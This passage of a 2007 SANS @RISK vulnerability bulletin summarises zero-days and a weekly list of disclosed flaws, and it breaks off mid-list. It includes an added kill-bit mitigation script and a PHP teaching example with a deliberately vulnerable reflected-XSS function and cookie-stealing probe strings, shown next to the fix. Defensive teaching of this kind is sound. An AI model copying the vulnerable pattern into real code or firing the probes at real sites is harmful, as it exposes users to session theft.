@RISK: The Consensus Security Vulnerability Alert

Volume: VI, Issue: 14
April 2, 2007

"A really bad week." That's what the @RISK editor and Tippingpoint vulnerability researcher, Rohit Dhamankar wrote to us this morning. And the director of the Internet Storm Center, Johannes Ullrich readily agreed. Why?

Two zero-day vulnerabilities. Active exploits. No effective defenses. Windows had a zero-day that affects Vista as well as older versions. So important that Microsoft is issuing a special patch tomorrow and leaked it to a few folks today. The other zero-day hit CA's BrightStor. Holes in backup software may be more damaging than holes in operating systems because the vendors of backup software don't have the same level of automated patching that the operating system vendors have, and many users have *never* patched their backup software. And Lotus Domino users also had multiple vulnerabilities, some critical. Alan

PS. The good folks at SPI Dynamics contributed a useful status report on the first half of the "Month of PHP Bugs (MOPB)." It is at the end of this issue.

PPS. If you have any interest in application security join us for the webcast on the new examination and new developments in application security tools (Wednesday noon EDT) https://www.sans.org/webcasts/show.php?webcastid=91206

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

Category /                               # of Updates &
Platform                                 Number of Updates and Vulnerabilities
- -------------------------------------  -------------------------------------
Windows                                  1 (#1)
Other Microsoft Products                 1
Third Party Windows Apps                 7 (#4, #5, #7, #8)
Cisco                                    1 (#6)
Linux                                    3
BSD                                      1
Unix                                     2
Cross Platform                           26 (#2, #3)
Web Application - Cross Site Scripting   4
Web Application - SQL Injection          12
Web Application                          27

************************ Sponsored By SANS **************************

Join Storage, Security and Database professionals at the Log Management Summit April 23-25. Get help in selecting and implementing the right log management tools to ensure you meet regulatory requirements and improve security as well as improve operational efficiency. http://www.sans.org/info/5291
*********************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Other Microsoft Products
Third Party Windows Apps
Linux
BSD
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application

************************ Sponsored Link: **************************

a) Take the 2007 Log Management Survey and be eligible to win a Nintendo Wii system. Click here to take the survey. http://www.sans.org/info/5296
*********************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King and Rohit Dhamankar at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (2) CRITICAL: Computer Associates BrightStor "mediasvr.exe" Buffer Overflow (0-day)
  • Affected:
    • CA ARCserve Backup products
  • Description: Computer Associates BrightStor ARCserve Backup products provide backup services for Microsoft Windows, Novell NetWare, Linux, and UNIX. The "mediasvr.exe" process contains a buffer overflow vulnerability in the handling of RPC requests. A specially-crafted request to procedure 191 could trigger this buffer overflow. Successfully exploiting this buffer overflow would allow an attacker to execute arbitrary code with the privileges of the "mediasvr.exe" process, usually "SYSTEM/root". Note that a working exploit is publicly available for this vulnerability.

  • Status: Computer Associates confirmed, no updates available. Users may be able to mitigate the impact of this vulnerability by renaming the "mediasvr.exe" file to another name (e.g. "mediasvr.disabled") and restarting the BrightStor Tape Engine service.

  • References:
  • (4) HIGH: America Online SuperBuddy ActiveX Control Remote Code Execution
  • Affected:
    • America Online (AOL) 9.0 Security Edition
  • Description: The "SuperBuddy" ActiveX control, shipped by default with recent versions of the America Online (AOL) software, contains a vulnerability in the handling of certain parameters passed to its "LinkSBIcons" method. A specially-crafted web page that instantiates this control could exploit this vulnerability to execute arbitrary code with the privileges of the current user. Note that some technical details are publicly available for this vulnerability, and that reusable exploit code that targets arbitrary ActiveX controls is widely available and easily adaptable to this vulnerability. This software is shipped by default by several PC vendors, including Dell and HP.

  • Status: AOL confirmed, updates available. Note that the update is currently believed to be available only to users of AOL's internet service; users of other services may not have access to the update. Users can mitigate the impact of this vulnerability by disabling the control via Microsoft's "kill bit" mechanism for CLSID "189504B8-50D1-4AA8-B4D6-95C8F58A6414".

  • References:
  • (5) HIGH: Corel WordPerfect Office Overlong Printer Name Buffer Overflow
  • Affected:
    • Corel WordPerfect Office X3
  • Description: Corel WordPerfect Office, a popular office suite, contains a buffer overflow vulnerability. A specially-crafted document containing an overlong printer selection name could trigger this buffer overflow and execute arbitrary code with the privileges of the current user. Depending upon configuration, these documents may be opened without prompting. Note that a working exploit for this vulnerability is publicly available.

  • Status: Corel has not confirmed, no updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
  • (6) HIGH: Cisco Unified CallManager Multiple Denial of Service Vulnerabilities
  • Affected:
    • Cisco Unified Presence Server versions prior to 1.0(3)
    • Cisco Unified CallManager versions prior to 5.0(4a)SU1
  • Description: Cisco Unified CallManager, Cisco's Voice-over-IP (VoIP) call processing system, contains multiple denial-of-service vulnerabilities: (a) Failure to properly process certain Skinny Call Control Protocol (SCCP) requests could trigger a denial-of-service condition affecting voice services. SCCP operates on TCP ports 2000 and 2443. (b) Failure to properly handle large amounts of ICMP Echo Requests (commonly referred to as "pings") could trigger several denial-of-service conditions, affecting voice services. (c) A specially-crafted UDP packet sent to the IPSec Manager Server on UDP port 8500 could trigger a denial-of-service condition affecting call forwarding and deployment of configuration changes.

  • Status: Cisco confirmed, updates available.

  • Council Site Actions: Two of the reporting council sites are using the affected software. One site plans to deploy the updates during their next regular maintenance cycle. The other site is working out their plan for patching.

  • References:
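For the kill-bit mitigation described in entry (4) above, the following is an added PowerShell example (not from the bulletin, AOL or Microsoft) that sets Internet Explorer's kill bit for the CLSID quoted there and verifies the result. The registry location and the 0x400 flag are Microsoft's documented kill-bit mechanism (KB 240797); the script must run from an elevated session.

```powershell
# Added example: apply the IE "kill bit" to the SuperBuddy control CLSID from the bulletin.
# Run from an elevated (Administrator) PowerShell session.
$clsid   = '{189504B8-50D1-4AA8-B4D6-95C8F58A6414}'   # CLSID quoted in entry (4)
$base    = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
$key     = Join-Path $base $clsid
$KILLBIT = 0x400   # "Compatibility Flags" bit that blocks the control in IE (KB 240797)

# Create the per-CLSID key if the control has never been flagged before.
if (-not (Test-Path $key)) {
    New-Item -Path $key -Force | Out-Null
}

# Preserve any compatibility flags already present; only OR in the kill bit.
$current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
$new     = [int]$current -bor $KILLBIT
Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord

# Verify: read the value back and confirm the bit is set.
$flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
if ($flags -band $KILLBIT) {
    'Kill bit set for {0} (Compatibility Flags = 0x{1:X})' -f $clsid, $flags
} else {
    Write-Error "Kill bit NOT set for $clsid"
}

# On 64-bit Windows, 32-bit Internet Explorer reads the Wow6432Node view of the
# registry, so repeat the same steps under:
#   HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility
```

The kill bit only stops IE from instantiating the control; it does not remove the vulnerable file, so the vendor update should still be applied when available.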
Other Software
  • (7) CRITICAL: SignKorea SKCommAX ActiveX Control Buffer Overflow
  • Affected:
    • SignKorea SKCommAX ActiveX Control versions 7.2.0.2 and 6.6.0.1 and prior
  • Description: The SignKorea SKCommAX ActiveX control, designed to perform certificate and identity validation, contains a buffer overflow vulnerability. By passing an overly-long "UserID" parameter to the "DownloadCertificateExt" method in this control, a malicious web page could exploit this buffer overflow and execute arbitrary code with the privileges of the current user. Note that reusable exploit code that targets ActiveX controls is widely available and can be easily adapted to exploit this control.

  • Status: SignKorea confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary. One site commented that any attempt to download this component would be blocked by their active content filter and any attempt to exploit the vulnerability would be blocked by their web-proxy anti-malware.

  • References:
  • (8) HIGH: InterVations NaviCopa HTTP Server Buffer Overflow
  • Affected:
    • InterVations NaviCopa HTTP Server version 2.01 and prior
  • Description: InterVations NaviCopa, a popular HTTP server for Microsoft Windows, contains a buffer overflow vulnerability. By passing an overlong URL to the server, an attacker could overflow a stack-based buffer and execute arbitrary code with the privileges of the server process. A working exploit and full technical details are available for this vulnerability.

  • Status: InterVations confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 14, 2007

This list is compiled by Qualys (www.qualys.com) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5411 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 07.14.1 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution
  • Description: Microsoft Windows is exposed to an issue which can result in the execution of arbitrary code remotely. This issue occurs due to a memory corruption error caused when handling malformed ANI cursor or icon files. Windows XP SP2 and Windows Server 2003 SP1 when running Internet Explorer versions 6 and 7 are affected.
  • Ref: http://www.avertlabs.com/research/blog/?p=230

  • 07.14.2 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer HTML Denial of Service
  • Description: Microsoft Internet Explorer is exposed to a denial of service issue because it fails to handle a malformed web page properly. The issue occurs when the application processes a malicious page containing an excessive amount of "0x90" instructions in between the "HTML", "HEAD" and "TITLE" HTML tags. Microsoft Internet Explorer version 7 is affected.
  • Ref: http://www.securityfocus.com/bid/23178

  • 07.14.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Computer Associates BrightStor ARCserve Backup Buffer Overflow
  • Description: Computer Associates BrightStor ARCserve Backup products provide backup and restore protection for Windows, NetWare, Linux, and UNIX servers as well as Windows, Mac OS X, Linux, UNIX, AS/400, and VMS clients. The application is affected by a remote buffer overflow issue because the application fails to perform proper bounds checking on data supplied to the application. Computer Associates BrightStor ARCServe Backup for Windows 11.0, and Computer Associates BrightStor ARCServe Backup versions 11.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/23209

  • 07.14.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: FastStone Image Viewer Unspecified Buffer Overflow
  • Description: FastStone Image Viewer is an application that allows users to view images. The application is exposed to an unspecified stack-based buffer overflow issue because it fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. FastStone Image Viewer version 2.8 is affected.
  • Ref: http://www.securityfocus.com/bid/23196

  • 07.14.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: IBM Lotus SameTime STJNILoader.OCX ActiveX Control LoadLibrary Input Validation
  • Description: IBM Lotus Sametime is a realtime web conferencing application. The Sametime STJNILoader.ocx ActiveX control is vulnerable to an input validation issue because the control fails to adequately sanitize user-supplied input to the exported "LoadLibrary" function. STJNILoader 3.1.0.26 and Sametime 7.0 are affected.
  • Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=495

  • 07.14.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: NaviCopa Web Server GET Request Buffer Overflow
  • Description: NaviCOPA Web Server is a commercially available webserver application for Microsoft Windows operating systems. The application is exposed to a buffer overflow issue because it fails to adequately bounds check user-supplied data before copying it to an insufficiently sized buffer. NaviCOPA version 2.01 is affected.
  • Ref: http://www.securityfocus.com/archive/1/463931

  • 07.14.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Corel WordPerfect Office PRS Stack Buffer Overflow
  • Description: Corel WordPerfect Office is a software suite which provides word processing, spreadsheet, presentation and email applications for the Microsoft Windows operating system. The application is exposed to a stack-based buffer overflow issue because the software fails to adequately bounds check user-supplied data before copying it to an insufficiently sized buffer. WordPerfect X3 version 13.0.0.565 is affected.
  • Ref: http://www.securityfocus.com/archive/1/464046

  • 07.14.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: SignKorea SKCommAX ActiveX Control Remote Buffer Overflow
  • Description: SignKorea SKCommAX ActiveX Control is a web-based component for the SignKorea SKCommAX application. The application is exposed to a buffer overflow issue because it fails to properly check boundaries on user-supplied data before copying it to an insufficiently sized buffer. SignKorea SKCommAX ActiveX Control versions 7.2.0.2 and 6.6.0.1 are affected.
  • Ref: http://www.securityfocus.com/bid/23149

  • 07.14.9 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: B21Soft BASP21 BSMTP.DLL CRLF Injection
  • Description: BASP21 is an SMTP component produced by B21Soft. The application is exposed to a CRLF injection issue because unspecified functions in the "BSMTP.DLL" library fail to properly sanitize input when constructing and sending email messages. BASP21 version 2003.0211 and BASP21 Pro versions 1.0.702.27 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/23134

  • 07.14.10 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel DCCP Local Information Disclosure
  • Description: DCCP is the Datagram Congestion Control Protocol. DCCP is IP protocol 33 and is designed to be a transport-level protocol that provides congestion control similar to TCP but does not provide reliability or retransmission features. Please refer to the advisory for further details. Linux kernel versions 2.6.20.4 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/463934

  • 07.14.11 - CVE: CVE-2007-1463, CVE-2007-1464
  • Platform: Linux
  • Title: Inkscape Client Malicious Jabber Server Format String
  • Description: Inkscape is an open-source vector graphics editor. The Inkscape client application is exposed to a format string issue because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted printing function. Please refer to the advisory for further details.
  • Ref: http://www.securityfocus.com/bid/23138

  • 07.14.12 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel IPV6_SockGlue.c NULL Pointer Dereference
  • Description: The Linux kernel is exposed to a NULL pointer dereference issue in the "do_ipv6_setsockopt()" function of the "net/ipv6/ipv6_sockglue.c" file. Please refer to the advisory for further details.
  • Ref: http://www.securityfocus.com/bid/23142

  • 07.14.13 - CVE: CVE-2007-1677
  • Platform: BSD
  • Title: NetBSD ISO(4) Buffer Overflow
  • Description: The ISO protocol family is a collection of protocols that uses the ISO address format. NetBSD ISO is exposed to a local buffer overflow issue because it fails to properly bounds check user-supplied input before copying it to an insufficiently sized memory buffer. Please refer to the advisory for further details.
  • Ref: http://www.securityfocus.com/bid/23193

  • 07.14.14 - CVE: CVE-2007-1349
  • Platform: Unix
  • Title: Mod_Perl Path_Info Remote Denial of Service
  • Description: The "mod_perl" module is an Apache module that adds the Perl scripting language to the Apache webserver. The module is exposed to a remote denial of service issue when an attacker sends specially crafted data through the "path_info" parameter in a URI. Please refer to the advisory for further details.
  • Ref: http://www.securityfocus.com/bid/23192

  • 07.14.15 - CVE: CVE-2007-0720
  • Platform: Unix
  • Title: CUPS Partial SSL Connection Remote Denial of Service
  • Description: Easy Software Products CUPS (Common Unix Printing System) is a widely used set of printing utilities for Unix-based systems. The application is exposed to a remote denial of service issue when the service handles SSL requests that are not completely negotiated. CUPS versions 1.2.10 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/463846

  • 07.14.16 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple Hitachi JP1/HiCommand Products Local Information Disclosure
  • Description: Hitachi JP1/HiCommand is a series of software products used to monitor and manage data storage infrastructures. The products are exposed to an information disclosure issue due to an unspecified error. Please refer to the advisory for further details.
  • Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-007_e/index-e.html

  • 07.14.17 - CVE: Not Available
  • Platform: Cross Platform
  • Title: CruiseWorks and Minna De Office Access Restrictions Bypass
  • Description: Kynos Logic Inc. Cruiseworks and Asian Technology Co, LTD. Minna De Office are groupware applications available for Windows and Linux operating platforms. Both applications are exposed to an access restriction bypass issue because they fail to implement adequate access restrictions. CruiseWorks 1.09e and Minna De Office 2.0, 1.12, and prior versions are affected.
  • Ref: http://www.securityfocus.com/bid/23198

  • 07.14.18 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP Multiple Functions Reference Parameter Information Disclosure
  • Description: PHP is exposed to an information disclosure vulnerability due to a design error. PHP versions 4 through 4.4.6 and 5 through 5.2.1 are affected.
  • Ref: http://www.php-security.org/MOPB/MOPB-37-2007.html

  • 07.14.19 - CVE: Not Available
  • Platform: Cross Platform
  • Title: TrueCrypt Mount Set-EUID Local Privilege Escalation
  • Description: Truecrypt is an open source application to encrypt files. The application is exposed to a local privilege escalation issue due to a failure in the application to properly verify permissions before mounting files. Truecrypt version 4.3 is affected.
  • Ref: http://www.securityfocus.com/archive/1/464064

  • 07.14.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cisco Unified CallManager And Unified Server Multiple Remote Denial Of Service Vulnerabilities
  • Description: Cisco Unified CallManager (CUCM) is the call processing component for the Cisco IP telephony solution. Cisco Unified Presence Server (CUPS) is an identity tracking component of the Cisco IP telephony solution. The application is exposed to multiple remote denial of service issues because the devices fail to handle certain network packets or network requests. Please refer to the advisory for further details.
  • Ref: http://www.cisco.com/en/US/products/products_security_advisory09186a008080f17b.shtml

  • 07.14.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Data Domain Administration Interface Local Privilege Escalation
  • Description: Data Domain is a disk backup and data protection application. The application is exposed to a local privilege escalation issue because the application fails to sanitize user-supplied input before passing it to a UNIX shell for execution. Data Domain versions 3.0.0 through 4.0.3.5 are affected.
  • Ref: http://www.securityfocus.com/archive/1/464085

  • 07.14.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass
  • Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to an "open_basedir" restriction bypass issue. PHP 4 up to and including 4.4.6, and PHP 5 up to and including 5.2.1 are affected.
  • Ref: http://www.php-security.org/MOPB/MOPB-36-2007.html#top

  • 07.14.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM Lotus Domino Web Access Unspecified Cross-Site Scripting
  • Description: IBM Lotus Domino Web Access is a messaging and personal information manager available for Linux, UNIX, and Microsoft Windows. The application is exposed to cross-site scripting attacks because it fails to sufficiently sanitize user-supplied input before displaying it in dynamically generated content. IBM Lotus Domino versions 7.0.2 and earlier are affected.
  • Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=493

  • 07.14.24 - CVE: CVE-2007-1675
  • Platform: Cross Platform
  • Title: IBM Lotus Domino IMAP Unspecified Buffer Overflow
  • Description: IBM Lotus Domino is a client/server product designed for collaborative working environments. Domino is designed for email, scheduling, instant messaging and data-driven applications. The application is exposed to a remote buffer overflow issue because it fails to properly bounds check user-supplied data before copying it to an insufficiently sized memory buffer.
  • Ref: http://www.zerodayinitiative.com/advisories/ZDI-07-011.html

  • 07.14.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM Lotus Domino LDAP Server Task Unspecified Buffer Overflow
  • Description: IBM Lotus Domino is a client/server product designed for collaborative working environments. Domino is designed for email, scheduling, instant messaging, and data-driven applications. The application is exposed to a remote buffer overflow vulnerability because it fails to properly bounds check user-supplied data before copying it to an insufficiently sized memory buffer. IBM Lotus Domino 7.0.2 and earlier versions are affected.
  • Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=494

  • 07.14.26 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ESRI ArcSDE Server Unspecified Denial of Service
  • Description: ESRI ArcSDE Server is used to access multiuser geographic databases. The application is exposed to a remote denial of service issue due to an unspecified error. ESRI ArcSDE Server versions 8.3, 9.0 and 9.1 are affected.
  • Ref: http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=19&MetaID=1260

  • 07.14.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP Zip_Entry_Read() Integer Overflow
  • Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to an integer overflow issue because it fails to ensure that integer values aren't overrun. PHP versions prior to 4.4.5 are affected.
  • Ref: http://www.php-security.org/MOPB/MOPB-35-2007.html

  • 07.14.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: HP OpenView Network Node Manager Unspecified Remote Unauthorized Access
  • Description: HP OpenView Network Node Manager is a network management application. It is exposed to an unspecified, unauthorized access issue. HP OpenView versions 6.20, 7.01, 7.50, 7.51 and versions in the 6.40 branch are affected. Please refer to the advisory for further details.
  • Ref: http://www.securityfocus.com/bid/23163

  • 07.14.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: HP Jetdirect FTP Print Server RERT Command Denial of Service
  • Description: HP JetDirect FTP Print Server provides network connectivity between printers and computers. The application is exposed to a remote denial of service issue which occurs when the "RERT" command is passed a filename consisting of 271 to 277 characters. FTP Print Server 2.4 and prior versions are affected.
  • Ref: http://www.securityfocus.com/bid/23168

  • 07.14.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: High Performance Anonymous FTP Server Multiple Remote Buffer Overflow Vulnerabilities
  • Description: High Performance Anonymous FTP Server is an FTP (File Transfer Protocol) application. It is exposed to multiple buffer overflow issues because it fails to do proper bounds checking. High Performance Anonymous FTP server version 1.01 is affected.
  • Ref: http://www.securiteam.com/securitynews/5AP0L1PKUU.html

  • 07.14.31 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Asterisk PBX_AEL.C Switch Blocks Security Bypass
  • Description: Asterisk is an open source PBX application available for multiple operating platforms. The Asterisk Extension Language (AEL) is a programming language designed for use with Asterisk PBX systems. The application is exposed to a security bypass issue because the AEL fails to securely generate extensions when compiling arbitrary labels. Asterisk versions in the 1.2.0 and 1.4.0 branches are affected.
  • Ref: http://www.securityfocus.com/bid/23155

  • 07.14.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP Folded Mail Headers Email Header Injection
  • Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The package is exposed to an email header injection issue because it fails to properly sanitize data in the "mail()" function when handling the "Subject" and "To" headers in folded mail headers. PHP 4 versions up to and including 4.4.6, and PHP 5 versions up to and including 5.2.1 are affected.
  • Ref: http://www.php-security.org/MOPB/MOPB-34-2007.html

  • 07.14.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Fizzle RSS Feed HTML Injection
  • Description: Fizzle RSS/Atom is a feed reader plugin for Mozilla Firefox. The application is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Fizzle RSS version 0.5 is affected.
  • Ref: http://www.securityfocus.com/bid/23144

  • 07.14.34 - CVE: CVE-2007-1589
  • Platform: Cross Platform
  • Title: TrueCrypt Dismount Set-EUID Local Denial of Service
  • Description: Truecrypt is an open source application to encrypt files. The application is exposed to a local denial of service issue when users are able to dismount mounted volumes when "set-euid" mode is enabled. Truecrypt versions prior to 4.3 are affected.
  • Ref: http://www.securityfocus.com/bid/23128

  • 07.14.35 - CVE: CVE-2006-4175
  • Platform: Cross Platform
  • Title: Sun Java System Directory Server Uninitialized Pointer Remote Memory Corruption
  • Description: Sun Java System Directory Server is an LDAP (Lightweight Directory Access Protocol) server distributed with multiple Sun products. The issue exists in the "ns-slapd" daemon/server when processing clean up code after certain failed queries. Sun Java System Directory Server versions prior to 5.2 Patch5 are affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102853-1&searchclause=

  • 07.14.36 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP Hash Table Overwrite Arbitrary Code Execution
  • Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to an arbitrary code execution issue which occurs because the session extension does not set a proper value for the reference count for session variables. PHP 4 versions prior to 4.4.5, and PHP 5 versions prior to 5.2.1 are affected.
  • Ref: http://www.php-security.org/MOPB/MOPB-30-2007.html

  • 07.14.37 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP Session Data Deserialization Arbitrary Code Execution
  • Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to an arbitrary code execution issue when "register_globals" is activated, and session data can be deserialized to overwrite the PHP "_SESSION" array. PHP 4 versions prior to 4.4.5, and PHP 5 versions prior to 5.2.1 are affected.
  • Ref: http://www.php-security.org/MOPB/MOPB-31-2007.html

  • 07.14.38 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP Session_Decode Double Free Memory Corruption
  • Description: PHP is exposed to a double free memory corruption issue. PHP versions 4.4.5 and 4.4.6 are affected. Please refer to the advisory for further details.
  • Ref: http://www.php-security.org/MOPB/MOPB-32-2007.html

  • 07.14.39 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHPDoc Confirm_Phpdoc_Compiled Local Buffer Overflow
  • Description: PHPDoc is a PHP extension that is used to generate API documentation of object oriented and procedural code. PHPDoc is also called PhpDocumentor. The application is exposed to a local buffer overflow issue because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. All versions of PHPDoc are affected.
  • Ref: http://www.securityfocus.com/archive/1/463843

  • 07.14.40 - CVE: CVE-2007-1465
  • Platform: Cross Platform
  • Title: dproxy Stack-Based Buffer Overflow
  • Description: dproxy is a small, freely available caching DNS server. The application is exposed to a stack-based buffer overflow issue because it fails to properly check boundaries on user-supplied data before copying it to an insufficiently sized buffer. Matthew Pratt dproxy versions 0.1 through 0.5 are affected.
  • Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053146.html

  • 07.14.41 - CVE: Not Available
  • Platform: Cross Platform
  • Title: DataRescue IDA Pro Processor_Request Authentication Bypass
  • Description: DataRescue IDA Pro is a debugger and disassembler. It includes a remote debugger server over TCP/IP. Users can specify whether a password is required by using the "-P" command line option. The application is exposed to an authentication bypass issue because it fails to check whether the "require-authentication" flag has been specified. DataRescue IDA Pro versions 4.8 through 5.1 are affected.
  • Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=492

  • 07.14.42 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Overlay Weaver Unspecified Cross-Site Scripting
  • Description: Overlay Weaver is an overlay network (DHT) construction toolkit. The application is exposed to a cross-site scripting issue because it fails to properly sanitize input. This issue resides in the DHT shell. Overlay Weaver versions 0.5.9 to 0.5.11 are affected. Please refer to the advisory for further details.
  • Ref: http://overlayweaver.sourceforge.net/news/20070329/

  • 07.14.43 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: aBitWhizzy Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities
  • Description: aBitWhizzy is a PHP script that uses whizzywig.js to create and edit web pages through a WYSIWYG interface. The application is exposed to multiple cross-site scripting and directory traversal issues because it fails to sufficiently sanitize user-supplied input to the "d" parameter.
  • Ref: http://www.securityfocus.com/bid/23167

  • 07.14.44 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Mephisto Blog Search Function Cross-Site Scripting
  • Description: Mephisto Blog is a web log application, implemented in Ruby. The application is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to its search function. Mephisto Blog version 0.7.3 is affected.
  • Ref: http://www.securityfocus.com/bid/23141

  • 07.14.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: CcCounter Index.PHP Cross-Site Scripting
  • Description: CcCounter is a web site hit counter application. It is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "dir" parameter of the "index.php" script. CcCounter version 2.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/463820
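
The cross-site scripting entries above all describe the same sink: a request parameter is written into the page unescaped. The PHP below is an added illustration, not code from CcCounter, Mephisto, aBitWhizzy or Overlay Weaver; the "dir" parameter and the HTML fragments are placeholders chosen to mirror the advisories. The fix is the same one that applies to the HTML injection entries later in this issue, where stored rather than reflected input reaches the page.

```php
<?php
// Added example, not code from any product listed in this issue: the reflected
// XSS pattern the entries above describe, and the output-encoding fix.
// The "dir" parameter and the HTML fragments are placeholders.

// VULNERABLE: the raw request value is pasted into the HTML, so
// ?dir=%3Cscript%3Ealert(document.cookie)%3C/script%3E becomes live script.
function render_vulnerable(array $get)
{
    $dir = isset($get['dir']) ? $get['dir'] : '';
    return '<p>Listing for ' . $dir . '</p>'
         . '<a href="index.php?dir=' . $dir . '">reload</a>';
}

// HARDENED: encode at the point of output, for the context the value lands in.
// htmlspecialchars with ENT_QUOTES escapes < > & " and ', so neither the text
// node nor the attribute can be broken out of; the explicit charset prevents
// multibyte encoding tricks.  The URL parameter gets URL encoding instead,
// which yields only unreserved characters and %XX escapes.
function esc_html($s)
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function render_hardened(array $get)
{
    $dir = isset($get['dir']) ? $get['dir'] : '';
    return '<p>Listing for ' . esc_html($dir) . '</p>'
         . '<a href="index.php?dir=' . rawurlencode($dir) . '">reload</a>';
}

// Constructed requests: one payload aimed at the text node, one at the attribute.
$probes = array(
    array('dir' => '<script>alert(document.cookie)</script>'),
    array('dir' => '"><script>alert(1)</script>'),
);
foreach ($probes as $get) {
    echo "vulnerable: ", render_vulnerable($get), "\n";
    echo "hardened:   ", render_hardened($get), "\n\n";
}
```

Encoding happens when the value is written out, not when it is read in, so the same value can still be stored or logged unchanged; a filter applied on input tends to miss whichever context the value is later used in.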

  • 07.14.46 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Picture-Engine Wall.PHP SQL Injection
  • Description: Picture Engine is a web-based image gallery management system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat" parameter of the "wall.php" script before using it in an SQL query. Picture-Engine versions 1.2.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/23205

  • 07.14.47 - CVE: Not Available
  • Platform: Web Application - SQL Injection
